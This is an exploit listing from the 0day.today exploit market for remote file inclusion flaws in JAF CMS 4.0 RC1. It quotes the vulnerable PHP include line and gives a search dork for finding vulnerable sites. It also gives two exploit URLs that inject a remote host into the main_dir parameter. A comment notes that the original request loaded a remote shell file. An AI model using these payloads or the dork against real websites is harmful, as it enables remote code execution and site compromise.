[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

JAF CMS <= 4.0 RC1 Multiple Remote File Include Vulnerabilities

Author
ThE TiGeR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-920
Category
web applications
Date add
03-10-2006
Platform
unsorted
===============================================================
JAF CMS <= 4.0 RC1 Multiple Remote File Include Vulnerabilities
===============================================================




#===========================================================================================
#JAF CMS Remote file include (website)
#===========================================================================================
#
#Script name : JAF CMS
#
#Version : 4.0
#
#===========================================================================================
#Vulnerable Code :
#
# if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
#
#===========================================================================================
#Dork : powered by JAF CMS   2004 - 2006
#
#Exploit :
#(1)
#http://www.site.com/[jmf_path]/module/forum/main.php?id=1&main_dir=http://www.milw0rm.com/index.php?&
#(2)
#http://www.site.com/[jmf_path]/module/forum/headlines.php?id=1&main_dir=http://www.milw0rm.com/index.php?&
#
#===========================================================================================
#
#Discoverd By : ThE TiGeR
#
#Contact : miro_tiger100[at]hotmail[dot]com
#
#===========================================================================================

/*
 * modified the authors GET request from
 * ?website=http://www.site.com/shell.txt?
 * to the current. /str0ke
 */



#  0day.today [2024-12-25]  #